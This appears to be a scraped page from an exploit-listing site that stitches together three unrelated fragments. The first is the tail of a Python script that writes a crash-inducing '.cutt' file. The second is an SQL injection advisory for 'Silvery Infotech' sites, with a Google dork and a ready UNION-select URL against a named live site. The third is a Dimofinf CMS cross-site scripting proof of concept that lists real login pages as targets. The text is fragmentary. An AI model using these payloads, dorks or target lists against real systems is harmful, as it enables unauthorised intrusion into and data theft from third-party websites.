time.date=2016 Feb 18 23.29.14
payload=2
file=C:\Documents and Settings\IEUser\Desktop\ABC.cutt
app=1.1.3
[order.blanks]
b001={ "uid": "908113387", "material": "A", "length": "222", "quantity": "1", "knife": "1", "indent": "11", "cost": "1.0", "comment": "1", "id": "1", "name": "a" }
[order.pieces]
p001={ "uid": "124270241", "material": "A", "length": "111", "quantity": "1", "label": "1", "comment": "1", "id": "1", "name": "a", "orphans": "0" }
[layout.summary]
summary={ "output": "112.000", "used.len": "222.000", "used": "1", "pieces": "1", "cmu": "50.450", "waste": "49.550", "shifts": "1", "remnants": "0.000", "srest": "110.000", "cost": "222.000", "cost.ppu": "1.982", "brest": "110.0", "status": "", "type": "summary", "time.gone": "0", "time.date": "2016 Feb 18 23.29.14" }
blank01={ "name": "a", "cost": "1.000000", "blank": "1", "used": "1", "pieces": "1", "cmu": "50.450", "waste": "49.550", "shifts": "1", "output": "112.000", "used.len": "222.000", "cost.sum": "222.000", "cost.ppu": "1.982", "remnants": "0.000" }
[layout.cuttings]
c001={ "signature": "1#a1-", "copies": "1", "remains": "110", "blank": "1", "shifts": "1", "output": "#1 1", "layout": "111" }
[layout.cuttings.parts]
c001={ "signature": "1#a1-", "copies": "1", "remains": "110", "blank": "1", "shifts": "1", "output": "#1 1", "layout": "111", "name": "1" }
<!--A:block-->
"""
with open("crash.cutt", "w") as f:
    f.write(payload)
  23. #####################
# Exploit Title : 2016 Website Developed by Silvery Infotech sql injection
# Exploit Author : Ashiyane Digital Security Team
# Google Dork : "intext:Developed by Silvery Infotech" inurl:page.php?id=
# Date: 20 Feb 2016
# Tested On : Windows 10 , Kali linux
#################################
# Exploit And Demo:
# Vulnerable PHP File = page.php
# Vulnerable Parameter = id
#
# Attack Like : http://artlinkinteriors.com/page.php?id=-1%27%20and/**x**/@ghasem20:=concat_ws%280x3c62723e,@@version%29%20UNION%20SELECT%201,2,3,4,5,group_concat%280x3c62723e,table_name%29,7,8,9%20from%20information_schema.tables%20where%20table_schema=database%28%29--%20-
######################
# discovered by : ghasem20
# tnx : h_sqli.empire
######################
  24. Dimofinf CMS 3.0.0 Cross Site Scripting
Published: 2016.02.18
Credit: Persian Hack Team
Risk: Low
CWE: CWE-79
CVE: N/A
Local: No
Remote: Yes
Dork: "Powered by Dimofinf cms Version 3.0.0"

######################
# Exploit Title : Dimofinf CMS 3.0.0 Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.dimofinf.net/index.php
# Google Dork : "Powered by Dimofinf cms Version 3.0.0"
# Date: 2016/02/17
# Version = 3.0.0
######################
# PoC:
# Username: MobhaM" onmouseover=alert("MobhaM") bad="
# Password : 0
#
# http://www.dawadmisms.net/dimcp/login.php
# http://www.aswarzan.com/dimcp/login.php
# http://drhananclinic.com.sa/dimcp/login.php
# http://www.newsqassim.com/dimcp/login.php
# http://www.sudaninet.net/dimcp/login.php
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################